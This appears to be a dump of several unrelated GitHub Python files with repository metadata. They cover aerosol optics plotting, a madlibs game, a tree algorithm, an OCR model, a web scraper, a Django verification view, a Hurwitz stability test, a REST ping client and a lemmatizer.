X_Label=X_LabelA1, Y_label1=Y_LabelB3, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MSC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=MSC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB4, Plot_Title=Situation)\n\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MassDistribution1\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Mass_Sample_1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"MAC=\" + str(round(MAC_1, 2)) + \"\\n\" + \"MSC=\" + str(round(MSC_1, 2)) + \"\\n\" + \"MSC-Diff=\" + str(round(MSC_Diff_1, 2)),\n Y_label1=Y_LabelA7,\n Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MassDistribution2\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Mass_Sample_2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"MAC=\" + str(round(MAC_2, 2)) + \"\\n\" + \"MSC=\" + str(round(MSC_2, 2)) + \"\\n\" + \"MSC-Diff=\" + str(round(MSC_Diff_2, 2)),\n Y_label1=Y_LabelA7, Plot_Title=Situation)\n\n ################# SAVING\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Sample_Agggregate_Size\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Diameter)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Sample_SizeDistribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_LogN_Sample_SizeD, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA1, Plot_Title=\"Number Concentration\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Sample_SizeDistribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_LogN_Sample_SizeD)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Soot_Primary_Diameter_Median\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, 
Y_array=Save_Soot_Primary_Diameter_Median_Nano, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA2, Plot_Title=\"Primary Particle Diameter\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Soot_Primary_Diameter_Median\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Soot_Primary_Diameter_Median_Nano)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Diameter_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Diameter_Bank)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Number_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Number_Bank)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Probability_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Probability_Bank)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Absorption_Cross_Section_Sample\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Absorption_Cross_Section_Sample_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA3, Plot_Title=\"Total Absorption Cross Section\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Absorption_Cross_Section_Sample\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Absorption_Cross_Section_Sample_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Absorption_Efficiency_Sample\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Absorption_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA4, Plot_Title=\"Absorption Efficiency\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Absorption_Efficiency_Sample\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Absorption_Efficiency_Sample)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Differential_Scattering_Cross_Section\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Differential_Scattering_Cross_Section_Full_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA6, Plot_Title=\"Scattering Cross Section_ Diff\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Differential_Scattering_Cross_Section\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Differential_Scattering_Cross_Section_Full_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Scattering_Efficiency\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Scattering_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA5, Plot_Title=\"Scattering Efficiency\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Scattering_Efficiency\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, 
Save_Scattering_Efficiency_Sample)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"SSA\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_SSA_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA9, Plot_Title=\"SSA Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"SSA\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_SSA_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Scattering_Cross_Section_Total\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Scattering_Cross_Section_Total_Distribution_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA6, Plot_Title=\"Scattering Cross Section_ Total\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Scattering_Cross_Section_Total\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Scattering_Cross_Section_Total_Distribution_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Effective_Density\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Effective_Density, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA8, Plot_Title=\"Effective Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Effective_Density\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Effective_Density)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Mass_Sample_Effective_Density\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Mass_Sample_1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA7, Plot_Title=\"Mass Distribution using Effective Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Mass_Sample_Effective_Density\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Mass_Sample_1)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"MAC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_MAC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB3, Plot_Title=\"MAC Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MAC_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MAC_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"MSC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_MSC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB4, Plot_Title=\"MSC Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Distribution\", 
Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Mass_Sample_Rho_Cte\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Mass_Sample_2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA7, Plot_Title=\"Mass Distribution using Constant Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Mass_Sample_Rho_Cte\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Mass_Sample_2)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MAC\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MAC)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Total\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Total)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Diff\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Diff)\n","repo_name":"JieLuoybfq/FlareNet-Scattering-Absorption-Calculator","sub_path":"FSAC.py","file_name":"FSAC.py","file_ext":"py","file_size_in_byte":41145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22143199531","text":"import re\n\nmadlib = \"The ADJECTIVE panda walked to the NOUN and then VERB. A nearby NOUN was unaffected by these events.\"\n\n# Get an array of parts of speech to be requested\npos_regex = re.compile(r'ADJECTIVE|NOUN|VERB')\npos_arr = pos_regex.findall(madlib)\n\n# For each part of speech in the array\nfor word in pos_arr:\n prompt = 'Enter a '\n if word == 'ADJECTIVE':\n prompt = 'Enter an '\n prompt += word.lower() + ': '\n\n # Replace part of speech with user's word\n word = input(prompt)\n\n # Substitute first instance of regex in string with new word\n madlib = pos_regex.sub(word, madlib, 1)\n\nprint(madlib)\n","repo_name":"brentirwin/automate-the-boring-stuff","sub_path":"ch8/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8115702335","text":"###\n# Tree DFS Serialization\n# Time Complexity: O(n^2) n nodes and build string O(n)\n# Space Complexity: O(n^2)\n###\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findDuplicateSubtrees(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[TreeNode]\n \"\"\"\n d = collections.Counter()\n re = []\n self.dfs(root, d, re)\n return re\n \n def dfs(self, root, d, re):\n if not root:\n return \"#\"\n key = str(root.val) + \",\" + self.dfs(root.left, d, re) + \",\" + self.dfs(root.right, d, re)\n if d[key] == 1:\n re.append(root)\n d[key] += 1\n return key\n \n \n \n \n \n \n ","repo_name":"ihuei801/leetcode","sub_path":"MyLeetCode/python/Find Duplicate Subtrees.py","file_name":"Find Duplicate Subtrees.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9944366951","text":"import segmentation_models as sm\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization\nfrom tensorflow.keras.layers import GRU, 
Bidirectional\nfrom tensorflow.keras.layers import Dense, Activation\n\n\nfrom blocks import ctc_lambda_func, resnet_conv\n\n\n\ndef text_to_labels(text, letters):\n return np.asarray(list((map(lambda x: letters.index(x), text))))\n\ndef labels_to_text(labels, letters):\n return np.asarray(list((map(lambda x: letters[x], labels))))\n\n\n\n\ndef build_effnetb0_gru_ocr(\n letters_count,\n max_len_str,\n input_shape=(128, 1024),\n backbone_conv_filters=[256, 512],\n cnn_reshape_size=(32, 512),\n rnn_size=256,\n rnn_dropout=0.3,\n optimizer=tf.keras.optimizers.Adam(),\n):\n\n\n '''\n block4a_expand_activation (Acti (None, 16, 64, 240) \n block2b_activation (Activation) (None, 32, 128, 144) \n block6a_activation\n '''\n\n model = sm.Unet('efficientnetb0', input_shape=input_shape, activation='sigmoid', decoder_block_type='upsampling')\n\n backbone = tf.keras.Model(inputs=model.input, outputs=model.get_layer('block6a_activation').output)\n\n backbone_output = backbone.output\n\n x = resnet_conv(backbone_output, s=[3, 1], filters=backbone_conv_filters)\n\n x = tf.keras.layers.Reshape(target_shape=cnn_reshape_size, name='reshape')(x)\n \n x = Bidirectional(GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', dropout=rnn_dropout))(x)\n\n x = Bidirectional(GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', dropout=rnn_dropout))(x)\n\n x = BatchNormalization()(x)\n\n x = Dense(letters_count, kernel_regularizer=tf.keras.regularizers.l1_l2(l1=1e-5, l2=1e-4))(x)\n y_pred = Activation('softmax', name='softmax')(x)\n\n\n y_true = tf.keras.layers.Input(name='y_true', shape=[max_len_str], dtype='float32')\n\n input_length = tf.keras.layers.Input(name='input_length', shape=[1], dtype='int64')\n\n label_length = tf.keras.layers.Input(name='label_length', shape=[1], dtype='int64')\n\n loss = tf.keras.layers.Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([y_true, y_pred, input_length, label_length])\n\n model = tf.keras.Model(inputs=[backbone.input, y_true, input_length, label_length], outputs=loss)\n\n model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=optimizer)\n \n return model","repo_name":"dragynir/deeplr","sub_path":"models/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40928914216","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom api.proxy import Random_Proxy\n\n'''\nCredits: Joshua .\nURL: https://lethals.org.\nCopyright\\Trademark: © 2022 - 2023 Lethal Services ™ ​| All rights reserved.\n'''\n\ndef getAnihdPlay(host, query, page, proxie):\n moviesDictionary = {'Status': True,'Query': query,'Results': []}\n proxy = Random_Proxy()\n try:\n if proxie == 'true':\n if page != None:\n base_url = f'https://{host}/search.html?keyword={query}&page={page}'\n currentPage = page\n r = proxy.Proxy_Request(url=base_url, request_type='get')\n soup = BeautifulSoup(r.content, 'lxml')\n else:\n base_url = f'https://{host}/search.html?keyword={query}'\n currentPage = '1'\n r = proxy.Proxy_Request(url=base_url, request_type='get')\n soup = BeautifulSoup(r.content, 'lxml')\n else:\n if page != None:\n base_url = f'https://{host}/search.html?keyword={query}&page={page}'\n currentPage = page\n soup = BeautifulSoup(requests.get(base_url).content, 'lxml')\n else:\n base_url = f'https://{host}/search.html?keyword={query}'\n currentPage = '1'\n soup = BeautifulSoup(requests.get(base_url).content, 'lxml')\n except 
requests.exceptions.RequestException as e:\n        moviesDictionary['Status'] = False\n        moviesDictionary['error'] = str(e)\n        return moviesDictionary\n\n    moviesDictionary['Page'] = currentPage\n    items = soup.find_all('li', class_=\"video-block\")\n\n
    for item in items:\n        try:\n            #link\n            a = item.find('a')\n            href = a.get('href')\n            link = f'https://{host}{href}'\n            #Movie Cover\n            cover = item.find('div', class_=\"picture\")\n            img = cover.find('img')\n            poster = img['src']\n            #Movie Title\n            Name = item.find('div', class_=\"name\").text\n            nl0 = Name.replace('\\n                        ', \"\")\n            Title = nl0.replace(' \\n                ', \"\")\n            \n            Year = item.find('span', class_=\"date\").text\n            \n        except Exception as e:\n            link = str(e) \n            poster = str(e)\n            Title = str(e)\n            Year = str(e)\n        \n        moviesObject = {'Title': Title, 'Cover': poster, 'link': link, 'Date': Year} \n        moviesDictionary['Results'].append(moviesObject)\n    \n    return moviesDictionary","repo_name":"LethalServices/SearchAPI","sub_path":"api/anihdplay.py","file_name":"anihdplay.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"73717839597","text":"\"\"\"\n    Created by tareq on 27/6/19\n\"\"\"\nfrom rest_framework import status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom sol_factory.users.models import UserVerificationLink\n\n__author__ = \"Tareq\"\n\n\nclass UserVerificationView(APIView):\n    permission_classes = (AllowAny,)\n\n    def get(self, request, *args, **kwargs):\n        try:\n            verification_code = kwargs.get('verification_code', None)\n            verified_user = UserVerificationLink.verify_user_via_verification_link(verification_uid=verification_code)\n            data = {\n                'user_id': verified_user.pk,\n                'message': \"Verification successful\",\n                'success': True\n            }\n            return Response(\n                data=data, status=status.HTTP_200_OK, content_type=\"application/json\"\n            )\n        except Exception as exp:\n            data = {\n                'message': str(exp), 'success': False\n            }\n            return Response(\n                data=data, status=status.HTTP_500_INTERNAL_SERVER_ERROR, content_type=\"application/json\"\n            )\n","repo_name":"ashfaqshuvo007/shop_django_api","sub_path":"sol_factory/users/views/user_verification_view.py","file_name":"user_verification_view.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"13645890496","text":"from fractions import Fraction\nfrom utils import Error,HurwitzBase,extractTopZeros,areCoefficiensPositive\n\nclass HurwitzStabililtyTestForRealPolymonials(HurwitzBase):\n    \"\"\"\n    Algorithm 1.2\n    \"\"\"\n\n    def __init__(self, coefficients=[]):\n        super().__init__()\n        self.coefficients = extractTopZeros(coefficients)\n        self.degree = len(coefficients) - 1\n\n        # check args\n        if (len(self.coefficients) == 0):\n            raise Error(\"No coefficients Error\")\n        # extract top 0s\n\n        # Determine the signs of the coefficients\n        if not areCoefficiensPositive(self.coefficients):\n            raise Error(\n                \"invalid coefficients: given coefficients include negative values\"\n            )\n\n
    def makePolynomialQ(self, coefficients):\n        Q_coefficients = []\n        isEven = True\n\n        # Numerical processing\n        #mu = coefficients[0]/coefficients[1]\n        mu = Fraction(coefficients[0], coefficients[1])\n        # Process the terms starting from the highest order\n        for i in range(1, len(coefficients) - 1):\n            if isEven:\n                Q_coefficients.append(coefficients[i])\n            else:\n                Q_coefficients.append(\n                    coefficients[i] - mu * coefficients[i + 1])\n            # Alternate the processing\n            isEven = not isEven\n        # Append the constant term.\n        Q_coefficients.append(coefficients[-1])\n        if len(Q_coefficients) != len(coefficients) - 1:\n            raise Error(\"invalid degree of Q\")\n        return Q_coefficients\n\n
    def firstStep(self, coefficients):\n        P_array = []\n\n        if not areCoefficiensPositive(coefficients):\n            raise Error(\n                \"invalid coefficients: given coefficients include negative values\"\n            )\n        P_array.append(coefficients)\n        return P_array\n\n
    def secondStep(self, P_array, number: int):\n        \"\"\"\n        number(int): how many times\n        \"\"\"\n        assert number == len(P_array)-1, \"mismatch between number and array's length\"\n        if number != len(P_array)-1:\n            raise Error(\"mismatch between number and array's length\")\n\n        coefficients = P_array[number]\n        # Method termination\n        if not areCoefficiensPositive(coefficients):\n            return False\n\n        if number == self.degree - 2:\n            return False\n\n        return True\n\n
    def thirdStep(self, old_P_array, Q_coefficients):\n        P_array = old_P_array.copy()\n        P_array.append(self.makePolynomialQ(Q_coefficients))\n        return P_array\n\n
    def execute(self):\n        coefficients = self.coefficients\n\n        # contains the coefficients of each step.\n        P_array = self.firstStep(coefficients)\n        check = True\n        isHurwitz = False\n        number = 0\n\n        if (self.degree == 0):\n            return True\n\n        while (True):\n            check = self.secondStep(P_array, number)\n            if not check:\n                if number == self.degree - 2:\n                    isHurwitz = True\n                break\n            P_array = self.thirdStep(\n                old_P_array=P_array, Q_coefficients=P_array[-1])\n            number += 1\n        self.P_array = P_array\n        return isHurwitz","repo_name":"kmdmnak/Hurwitz","sub_path":"api/Hurwitz/others/RealPolynomial.py","file_name":"RealPolynomial.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"36443454802","text":"import os\r\nimport json\r\nfrom automic_rest import config\r\nimport requests\r\nfrom requests.exceptions import HTTPError\r\nfrom requests.exceptions import Timeout\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n\r\n\r\n\r\nclass ping:\r\n    def __init__(self):\r\n        # Summary: Can be used to determine if the JCP process is currently running.\r\n        self.response = None \r\n        self.body = None \r\n        self.url = None \r\n        self.headers = None \r\n        self.content = None \r\n        self.text = None \r\n        self.status = None \r\n        self.path = config().setArgs('/ping', locals())\r\n\r\n        self.request() \r\n\r\n
    def request(self): \r\n        requests_headers = {\r\n            'Content-type': 'application/json', \r\n            'Accept': 'application/json', \r\n            'Authorization' : \"Basic %s\" % config().base64auth \r\n        }\r\n        try: \r\n            r = requests.get(\r\n                config().url+self.path, \r\n                headers=requests_headers,\r\n                verify=config().sslverify, \r\n                timeout=config().timeout \r\n            ) \r\n            self.status = r.status_code \r\n            # If the response was successful, no Exception will be raised \r\n            r.raise_for_status() \r\n        except HTTPError as http_err: \r\n            print(f'HTTP error occurred: {http_err}') # Python 3.6 \r\n        except Exception as err: \r\n            
print('The request timed out') \r\n except Exception as err: \r\n print(f'Other error occurred: {err}') # Python 3.6 \r\n else: \r\n pass \r\n \r\n \r\n return self \r\n","repo_name":"ufopilot/automic_rest","sub_path":"automic_rest/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"72174704876","text":"# -*- coding: utf-8 -*-\n\nimport attr\nimport json\nimport logging\nimport numbers\nimport os\n\nfrom os.path import commonprefix\nfrom collections import Counter, defaultdict\nfrom tqdm import tqdm\n\nfrom allennlp.data.fields import SequenceLabelField\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s(frozen=True)\nclass LemmatizeRule(object):\n cut_prefix = attr.ib(default=0)\n cut_suffix = attr.ib(default=0)\n append_suffix = attr.ib(default='')\n lower = attr.ib(default=False)\n capitalize = attr.ib(default=False)\n upper = attr.ib(default=False)\n\n\nclass LemmatizeHelper(object):\n UNKNOWN_RULE_INDEX = 0\n _UNKNOWN_RULE_PLACEHOLDER = LemmatizeRule(cut_prefix=100, cut_suffix=100, append_suffix='-' * 90)\n _OUTPUT_FILE_NAME = 'lemmatizer_info.json'\n\n def __init__(self, lemmatize_rules=None):\n self._lemmatize_rules = lemmatize_rules\n self._index_to_rule = self._get_index_to_rule()\n\n def fit(self, data, min_freq=3):\n rules_counter = Counter()\n\n for instance in tqdm(data):\n meta = instance.fields['metadata']\n words, lemmas = meta['words'], meta['lemmas']\n for word, lemma in zip(words, lemmas):\n if lemma == '_' and word != '_':\n continue\n\n rule = self.predict_lemmatize_rule(word, lemma)\n rules_counter[rule] += 1\n\n assert self.lemmatize(word, rule).replace('ё', 'е') == lemma.replace('ё', 'е')\n\n self._lemmatize_rules = {\n self._UNKNOWN_RULE_PLACEHOLDER: self.UNKNOWN_RULE_INDEX,\n LemmatizeRule(): self.UNKNOWN_RULE_INDEX + 1\n }\n skipped_count, total_count = 0., 0\n for rule, count in rules_counter.most_common():\n total_count += count\n if count < min_freq:\n skipped_count += count\n continue\n\n if rule not in self._lemmatize_rules:\n self._lemmatize_rules[rule] = len(self._lemmatize_rules)\n\n self._index_to_rule = self._get_index_to_rule()\n\n logger.info('Lemmatize rules count = {}, did not cover {:.2%} of words'.format(\n len(self._lemmatize_rules), skipped_count / total_count))\n\n def _get_index_to_rule(self):\n if not self._lemmatize_rules:\n return []\n return [rule for rule, _ in sorted(self._lemmatize_rules.items(), key=lambda pair: pair[1])]\n\n def get_rule_index(self, word, lemma):\n if lemma == '_' and word != '_':\n return self.UNKNOWN_RULE_INDEX\n\n rule = self.predict_lemmatize_rule(word, lemma)\n return self._lemmatize_rules.get(rule, self.UNKNOWN_RULE_INDEX)\n\n def get_rule_indices(self, instance):\n meta = instance.fields['metadata']\n words, lemmas = meta['words'], meta['lemmas']\n\n return [self.get_rule_index(word, lemma) for word, lemma in zip(words, lemmas)]\n\n def get_rule(self, rule_index):\n return self._index_to_rule[rule_index]\n\n def __len__(self):\n return len(self._lemmatize_rules)\n\n @staticmethod\n def predict_lemmatize_rule(word: str, lemma: str):\n def _predict_lemmatize_rule(word: str, lemma: str, **kwargs):\n if len(word) == 0:\n return LemmatizeRule(append_suffix=lemma, **kwargs)\n\n common_prefix = commonprefix([word, lemma])\n if len(common_prefix) == 0:\n rule = _predict_lemmatize_rule(word[1:], lemma, **kwargs)\n return attr.evolve(rule, cut_prefix=rule.cut_prefix + 1)\n\n return 
LemmatizeRule(cut_suffix=len(word) - len(common_prefix),\n append_suffix=lemma[len(common_prefix):], **kwargs)\n\n word, lemma = word.replace('ё', 'е'), lemma.replace('ё', 'е')\n return min([\n _predict_lemmatize_rule(word, lemma),\n _predict_lemmatize_rule(word.lower(), lemma, lower=True),\n _predict_lemmatize_rule(word.capitalize(), lemma, capitalize=True),\n _predict_lemmatize_rule(word.upper(), lemma, upper=True)\n ], key=lambda rule: rule.cut_prefix + rule.cut_suffix)\n\n def lemmatize(self, word, rule):\n if isinstance(rule, numbers.Integral):\n rule = self.get_rule(rule)\n\n assert isinstance(rule, LemmatizeRule)\n\n if rule.lower:\n word = word.lower()\n if rule.capitalize:\n word = word.capitalize()\n if rule.upper:\n word = word.upper()\n\n if rule.cut_suffix != 0:\n lemma = word[rule.cut_prefix: -rule.cut_suffix]\n else:\n lemma = word[rule.cut_prefix:]\n lemma += rule.append_suffix\n\n return lemma\n\n def apply_to_instances(self, instances):\n for instance in tqdm(instances, 'Lemmatizer apply_to_instances'):\n lemmatize_rule_indices = self.get_rule_indices(instance)\n field = SequenceLabelField(lemmatize_rule_indices, instance.fields['words'], 'lemma_index_tags')\n instance.add_field('lemma_indices', field)\n\n def save(self, dir_path):\n with open(os.path.join(dir_path, self._OUTPUT_FILE_NAME), 'w') as f:\n index_to_rule = [attr.asdict(rule) for rule in self._index_to_rule]\n json.dump(index_to_rule, f, indent=2, ensure_ascii=False)\n\n @classmethod\n def load(cls, dir_path):\n with open(os.path.join(dir_path, cls._OUTPUT_FILE_NAME)) as f:\n index_to_rule = json.load(f)\n\n lemmatize_rules = {\n LemmatizeRule(**rule_dict): index\n for index, rule_dict in enumerate(index_to_rule)\n }\n\n return cls(lemmatize_rules)\n","repo_name":"DanAnastasyev/GramEval2020","sub_path":"solution/train/lemmatize_helper.py","file_name":"lemmatize_helper.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"73"} +{"seq_id":"32089108763","text":"from ipaddress import IPv4Address\n\nfrom construct import 